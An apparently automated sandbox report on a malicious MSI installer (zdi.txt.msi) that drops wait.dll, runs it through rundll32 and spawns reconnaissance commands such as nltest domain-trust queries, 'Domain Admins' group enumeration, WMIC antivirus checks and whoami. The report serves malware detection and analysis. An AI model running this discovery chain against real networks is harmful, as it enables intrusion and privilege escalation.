Source: C:\Windows\System32\msiexec.exe	Process created: C:\Windows\Installer\MSI48D4.tmp "C:\Windows\Installer\MSI48D4.tmp" /DontWait C:/Windows/SysWOW64/rundll32.exe C:\Users\user\AppData\Roaming\wait.dll, Jump	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\System32\rundll32.exe "C:\Windows\SysWOW64\rundll32.exe" C:\Users\user\AppData\Roaming\wait.dll, Jump	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c ipconfig /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c systeminfo	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net view /all	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\wbem\WMIC.exe /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get * /Format:List	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c net config workstation	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName \| findstr /V /B /C:displayName \|\| echo No Antivirus installed	Jump to behavior
Source: C:\Windows\explorer.exe	Process created: C:\Windows\System32\cmd.exe /c whoami /groups	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\ipconfig.exe ipconfig /all	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\systeminfo.exe systeminfo	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\nltest.exe nltest /domain_trusts /all_trusts	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all /domain	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net view /all
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net group "Domain Admins" /domain
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 group "Domain Admins" /domain
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\net.exe net config workstation
Source: C:\Windows\System32\net.exe	Process created: C:\Windows\System32\net1.exe C:\Windows\system32\net1 config workstation
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wbem\WMIC.exe wmic.exe /node:localhost /namespace:\\root\SecurityCenter2 path AntiVirusProduct Get DisplayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\findstr.exe findstr /V /B /C:displayName
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: tsappcmp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: srclient.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: spp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: msi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\Installer\MSI48D4.tmp	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mfsrcsnk.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140_1.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Windows\explorer.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\ipconfig.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: esscli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: ntdsapi.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\nltest.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: browcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\net.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\net.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\net1.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\net1.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\net1.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: logoncli.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\net1.exe	Section loaded: cscapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: version.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: authz.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\whoami.exe	Section loaded: netutils.dll

Source: C:\Windows\Installer\MSI48D4.tmp

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00020424-0000-0000-C000-000000000046}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: zdi.txt.msi

Static file information: File size 2254336 > 1048576

Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr
Source:	Binary string: C:\dvs\p4\build\sw\rel\gpu_drv\r565\r565_00\drivers\ui\NvXDCore\x64\ReleaseWin7\bin\NvXDCore.pdb source: rundll32.exe, 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmp, wait.dll.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: zdi.txt.msi, MSI471C.tmp.1.dr, MSI473C.tmp.1.dr, MSI468D.tmp.1.dr, 424593.msi.1.dr, MSI46EC.tmp.1.dr
Source:	Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSI48D4.tmp, 00000003.00000002.1679646195.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, MSI48D4.tmp, 00000003.00000000.1677749985.0000000000C57000.00000002.00000001.01000000.00000003.sdmp, zdi.txt.msi, MSI48D4.tmp.1.dr, 424593.msi.1.dr, MSI4808.tmp.1.dr

Contains functionality to dynamically determine API calls

Source: C:\Windows\explorer.exe

Code function: 9_2_0B8D89E4 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,

9_2_0B8D89E4

PE file contains an invalid checksum

Source: wait.dll.1.dr

Static PE information: real checksum: 0x1d7e57 should be: 0x216e55

PE file contains sections with non-standard names

Source: wait.dll.1.dr

Static PE information: section name: .didat

Uses code obfuscation techniques (call, push, ret)

Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3323C push ecx; ret	3_2_00C3324F
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358C1 push eax; ret	3_2_00C358C2
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358C4 push edx; ret	3_2_00C358C6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358C8 push ebp; ret	3_2_00C358CA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358CC push edx; ret	3_2_00C358D6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358D7 push esp; ret	3_2_00C358DA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35881 push ecx; ret	3_2_00C35882
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35884 push ecx; ret	3_2_00C35892
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35893 push ebx; ret	3_2_00C35896
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35898 push si; ret	3_2_00C3589A
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358A0 push ebx; ret	3_2_00C358A6
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C358A9 push esi; ret	3_2_00C358AA
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35863 push esp; ret	3_2_00C35866
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35860 push edx; ret	3_2_00C35862
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35869 push edi; ret	3_2_00C3586A
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C3586F push ecx; ret	3_2_00C35872
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35875 push esp; ret	3_2_00C35876
Source: C:\Windows\Installer\MSI48D4.tmp	Code function: 3_2_00C35879 push edi; ret	3_2_00C3587A
Source: C:\Windows\System32\rundll32.exe	Code function: 5_3_0000023CDA650105 push ecx; retf	5_3_0000023CDA65010E

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: C:\Windows\System32\msiexec.exe

Executable created and started: C:\Windows\Installer\MSI48D4.tmp

Jump to behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /all

Drops PE files

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI468D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\wait.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI46EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48D4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI471C.tmp	Jump to dropped file

Drops PE files to the windows directory (C:\Windows)

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI468D.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI473C.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI46EC.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI48D4.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI471C.tmp	Jump to dropped file

Boot Survival

Uses net.exe to modify the status of services

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\net.exe net config workstation

Uses whoami command line tool to query computer and username

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\whoami.exe whoami /groups

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
